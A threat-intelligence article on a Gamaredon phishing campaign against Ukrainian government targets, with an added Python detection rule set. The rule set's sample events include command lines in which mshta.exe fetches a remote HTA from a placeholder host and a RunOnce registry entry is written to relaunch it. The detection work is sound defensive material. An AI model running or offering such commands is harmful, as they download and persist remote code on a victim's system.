A sustained cyber-espionage campaign linked to the Gamaredon threat group is actively targeting Ukrainian government organizations through large-scale phishing attacks and multi-stage malware delivery chains. The operation combines social engineering, abuse of trusted infrastructure, and custom malware loaders to maintain long-term access to compromised systems.
Also tracked as UAC-0010 or Shuckworm, Gamaredon continues to exploit CVE-2025-8088, a directory traversal vulnerability in WinRAR that allows malicious files to be written outside the intended extraction directory. Although the flaw has been widely abused since 2025, researchers noted that Gamaredon’s campaigns stand out due to their persistence, rapid infrastructure rotation, and repeated targeting of Ukrainian government entities.
Phishing Campaign Delivers GammaDrop Malware
The attacks begin with carefully crafted spearphishing emails sent either from compromised Ukrainian government accounts or spoofed domains designed to appear legitimate. Many of these emails mimic official court summons, legal notices, or government-related communications to increase the likelihood of user interaction.
The phishing attachments typically contain malicious RAR or ARJ archives disguised as regular documents. Inside the archive, researchers identified:
- A decoy PDF document used to distract the victim
- A hidden VBScript payload stored using NTFS Alternate Data Streams (ADS)
When the archive is extracted, the WinRAR vulnerability is abused to silently place the malicious VBScript into the Windows Startup folder. This ensures persistence on the infected machine without requiring additional user interaction.
The first-stage payload, known as GammaDrop, functions as a downloader responsible for retrieving additional malware from attacker-controlled infrastructure. Researchers observed that the script is heavily obfuscated using randomized variables, junk code, and automated generation techniques commonly associated with Gamaredon operations.
GammaLoad Expands Persistence and Reconnaissance
After execution, GammaDrop downloads a second-stage malware component called GammaLoad from infrastructure hosted through Cloudflare Workers. The payload is delivered as an HTA file and launched using mshta.exe in a hidden window to avoid drawing attention.
GammaLoad acts as both a persistence mechanism and a reconnaissance tool. It creates RunOnce registry entries and continuously communicates with command-and-control servers to receive instructions and additional payloads.
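As an added defensive example (not code from the article or from any vendor's detection content), the following Python rule set checks constructed Sysmon-style process-creation events for the chain described above: a script host running a .vbs from the Startup folder, mshta.exe fetching a remote HTA, mshta.exe spawned by that script host, and a RunOnce write by a process under mshta.exe. The event field names, file paths and the workers.dev hostname are assumptions chosen for illustration.

```python
import re

# Constructed Sysmon-style process-creation events (not from the article);
# paths, hostnames and file names are illustrative placeholders.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\u\AppData\Roaming\Microsoft\Windows'
                r'\Start Menu\Programs\Startup\summons.vbs"',
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://placeholder-worker.workers.dev/stage2.hta",
     "parent": r"C:\Windows\System32\wscript.exe"},
    {"image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"
                r' /v upd /t REG_SZ /d "mshta https://placeholder-worker.workers.dev/x.hta"',
     "parent": r"C:\Windows\System32\mshta.exe"},
    {"image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" C:\Users\u\Documents\report.docx',
     "parent": r"C:\Windows\explorer.exe"},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")

def _name(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

# Each rule maps one observable from the reported chain to a predicate.
RULES = {
    # GammaDrop stage: a VBScript in the Startup folder run by a script host.
    "vbs_from_startup_folder": lambda e: _name(e["image"]) in SCRIPT_HOSTS
        and re.search(r'\\startup\\[^"]*\.vbs\b', e["cmdline"], re.I) is not None,
    # GammaLoad stage: mshta.exe loading an HTA from a remote URL.
    "mshta_remote_url": lambda e: _name(e["image"]) == "mshta.exe"
        and re.search(r"https?://", e["cmdline"], re.I) is not None,
    # Downloader handing off to the loader: script host spawning mshta.exe.
    "mshta_spawned_by_script_host": lambda e: _name(e["image"]) == "mshta.exe"
        and _name(e["parent"]) in SCRIPT_HOSTS,
    # RunOnce persistence written by a child of mshta.exe.
    "runonce_write_from_mshta": lambda e: _name(e["parent"]) == "mshta.exe"
        and re.search(r"\\currentversion\\runonce\b", e["cmdline"], re.I) is not None,
}

def match_rules(event):
    """Return the names of all rules an event triggers (empty list = benign)."""
    return [name for name, pred in RULES.items() if pred(event)]

def scan(events):
    """Map each event index to its triggered rules."""
    return {i: match_rules(e) for i, e in enumerate(events)}

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(i, hits or "benign")
```

Any single rule firing in isolation is low-fidelity; the value is in the parent/child chain, so correlate hits across events sharing a process tree before alerting.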
The malware collects system-level information including:
- Computer name
- System drive details
- Volume serial numbers
- Victim identification data
This information is embedded into beaconing traffic, allowing attackers to uniquely track infected systems and selectively deliver follow-up malware.
Researchers also observed that Gamaredon frequently rotates its infrastructure using fast-flux DNS, dynamic DNS services, and short-lived domains to evade detection. Communication traffic is disguised using legitimate browser user-agent strings, while some newer variants imitate automated services such as Bingbot to blend malicious traffic with normal network activity.
The Security Service of Ukraine (SSU), along with regional government and law enforcement organizations, remains one of the primary targets of these campaigns. Researchers believe the operation’s success is also supported by weak email authentication practices across some targeted domains, where missing or poorly configured SPF, DKIM, and DMARC policies allow attackers to spoof trusted senders more effectively.
Although the malware itself is not considered highly advanced, Gamaredon continues to maintain a strong operational presence through continuous adaptation, large-scale phishing activity, and aggressive infrastructure management.
Security teams are advised to patch vulnerable WinRAR installations immediately, strengthen email authentication controls, monitor suspicious archive-based phishing activity, and block known malicious infrastructure associated with the campaign.